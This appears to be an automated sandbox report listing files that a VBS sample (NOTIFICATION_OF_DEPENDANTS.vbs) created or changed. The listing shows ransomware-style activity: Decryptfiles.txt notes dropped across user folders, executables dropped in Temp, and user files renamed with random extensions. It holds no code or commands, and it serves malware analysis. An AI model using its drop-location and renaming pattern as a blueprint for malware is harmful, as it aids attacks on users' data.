Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
NOTIFICATION_OF_DEPENDANTS.vbs
|
ASCII text
|
initial sample
|
||
C:\Users\Public\AccountPictures\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\Public\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\Public\Documents\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\Public\Downloads\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\Public\Libraries\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\Public\Libraries\RecordedTV.library-ms
|
data
|
modified
|
||
C:\Users\Public\Music\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\Public\Pictures\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\Public\Videos\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\.curlrc.kavi
|
data
|
dropped
|
||
C:\Users\user\.ms-ad\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\3D Objects\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0u2ggh1i.ury.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1nz5fynk.tnq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4bccm03k.uyb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_asmdgiyo.yry.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m4dtb4rh.0ki.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_momoqcak.tpg.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngtvg4fm.dsv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogjwy3uo.omj.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qkeuc0bz.5wy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qkrmfx1x.yyj.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qtna4nhm.5gf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uf3rzrvy.gje.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_urs51o2u.bw4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ydl4wlxj.bgl.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\eryy65ty.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\fjeljies.cpl
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\.curlrc.evro
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Collab\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Forms\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storek
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMDocs.sav
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\Preflight Acrobat Continuous\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\CRLogs\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\CRLogs\crashlogs\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Flash Player\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Headlights\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Linguistics\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\LogTransport2CC\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\LogTransport2\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\RTTransfer\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Sonar\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Sonar\SonarCC\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\AddIns\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Credentials\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Crypto\Keys\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_9e146be9-c76a-4720-bcdb-53011b87bd06
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Excel\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk.kmFp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Network\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\CREDHIST
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\3bb58c52-85cd-4424-83c3-47720a094118
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\Preferred
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\c6cd337d-cbfc-4f3d-88c4-6fd10913a1a0
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Speech\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Spelling\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-GB\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\AppContainerUserCertRead.AePN
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Vault\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\AccountPictures\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\CloudStore\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\CameraRoll.library-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\SavedPictures.library-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent Items\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AUFZRAWBIW.png
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BNAGMGSPLO.png
|
MPEG-4 LOAS, 4 or more streams
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BYIMNPJCRL.xlsx
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.mp3
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.pdf
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.xlsx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFDEXQWKNW.png
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EIVQSAOTAQ.jpg
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GIGIYTFFYT.docx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GIGIYTFFYT.mp3
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GIGIYTFFYT.xlsx
|
DOS executable (COM, 0x8C-variant)
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GIGIYTFFYT.xlsx.PMnv (copy)
|
DOS executable (COM, 0x8C-variant)
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GLTYDMDUST.docx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GLTYDMDUST.pdf
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.png
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HVLFEFMHHB.png
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\KGUUUSONWY.mp3
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MSTILBICVO.jpg
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MSTILBICVO.pdf
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NVWZAPQSQL.jpg
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NVWZAPQSQL.xlsx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PALRGUCVEH.jpg
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PALRGUCVEH.pdf
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.docx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PIVFAGEAAV.jpg
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PWCCAWLGRE.docx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PWCCAWLGRE.xlsx
|
OpenPGP Public Key Version 7
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QCFWYSKMHA.docx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.docx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.jpg
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.xlsx
|
DOS executable (COM)
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.xlsx.VEHa (copy)
|
DOS executable (COM)
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SQSJKEBWDT.mp3
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SQSJKEBWDT.pdf
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SQSJKEBWDT.xlsx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SUAVTZKNFL.docx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\TQDFJHPUIU.png
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZGGKNSUKOP.png
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZIPXYXWIOY.mp3
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTarget.IinT
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Desktop (create shortcut).DeskLink.waqy
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Documents.mydocs.hWBS
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Mail Recipient.MAPIMail.WLfl
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Extensions\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending Pings\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\times.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\AlternateServices.txt
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\ExperimentStoreData.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\SiteSecurityServiceState.txt
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addonStartup.json.lz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addons.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\bookmarkbackups\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\compatibility.ini
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\containers.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal.Olas
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\events\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832118.b6281059-34c6-49d8-97c7-24de33b104ab.new-profile.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832120.4cb4db2a-ee68-4128-8ff4-f04bdc710c24.event.jsonlz4
|
data
|
dropped
|
||
